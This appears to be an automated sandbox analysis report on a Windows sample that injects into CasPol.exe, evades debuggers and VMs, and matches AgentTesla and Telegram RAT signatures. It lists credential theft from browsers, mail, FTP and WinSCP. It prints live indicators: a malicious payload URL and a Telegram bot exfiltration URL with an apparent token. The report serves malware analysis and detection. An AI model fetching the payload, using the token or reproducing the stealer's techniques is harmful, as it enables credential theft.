Source: C:\Users\user\Desktop\file.exe Code function: 1_2_70AC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_70AC1BFF
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BDB04 mov eax, dword ptr fs:[00000030h] 1_2_033BDB04
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BC7B0 mov eax, dword ptr fs:[00000030h] 1_2_033BC7B0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5BFF mov eax, dword ptr fs:[00000030h] 1_2_033B5BFF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B562F mov eax, dword ptr fs:[00000030h] 1_2_033B562F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5E6F mov ebx, dword ptr fs:[00000030h] 1_2_033B5E6F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5E59 mov ebx, dword ptr fs:[00000030h] 1_2_033B5E59
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5E59 mov eax, dword ptr fs:[00000030h] 1_2_033B5E59
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B12AA mov eax, dword ptr fs:[00000030h] 1_2_033B12AA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5D06 mov eax, dword ptr fs:[00000030h] 1_2_033B5D06
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5DCF mov eax, dword ptr fs:[00000030h] 1_2_033B5DCF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5C4E mov eax, dword ptr fs:[00000030h] 1_2_033B5C4E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BC0A6 mov eax, dword ptr fs:[00000030h] 1_2_033BC0A6
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AD722 rdtsc 1_2_033AD722
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2063E990 LdrInitializeThunk, 6_2_2063E990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D50000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004034F7

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8436, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 623387 Sample: file.exe Startdate: 10/05/2022 Architecture: WINDOWS Score: 100 30 msdvc.com 2->30 32 api.telegram.org 2->32 38 Multi AV Scanner detection for domain / URL 2->38 40 Found malware configuration 2->40 42 Antivirus detection for URL or domain 2->42 44 7 other signatures 2->44 8 file.exe 22 2->8         started        signatures3 process4 file5 24 C:\Users\user\AppData\Local\...\System.dll, PE32 8->24 dropped 26 C:\Users\user\AppData\Local\...\MsMpCom.dll, PE32+ 8->26 dropped 28 C:\Users\...\ConfigXML_ScenarioProfile.dll, PE32 8->28 dropped 46 Writes to foreign memory regions 8->46 48 Tries to detect Any.run 8->48 50 Hides threads from debuggers 8->50 12 CasPol.exe 15 11 8->12         started        16 CasPol.exe 8->16         started        18 CasPol.exe 8->18         started        20 CasPol.exe 8->20         started        signatures6 process7 dnsIp8 34 msdvc.com 119.18.54.23, 443, 49748 PUBLIC-DOMAIN-REGISTRYUS India 12->34 36 api.telegram.org 149.154.167.220, 443, 49749 TELEGRAMRU United Kingdom 12->36 52 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->52 54 Tries to steal Mail credentials (via file / registry access) 12->54 56 Tries to harvest and steal ftp login credentials 12->56 62 4 other signatures 12->62 22 conhost.exe 12->22         started        58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->58 60 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->60 signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
119.18.54.23
 msdvc.com India
394695 PUBLIC-DOMAIN-REGISTRYUS true

Contacted Domains

Name IP Active
msdvc.com 119.18.54.23 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument false
    		high
    https://msdvc.com/oluwa_RcQBQnZSyJ230.bin true
    • Avira URL Cloud: malware
    		 unknown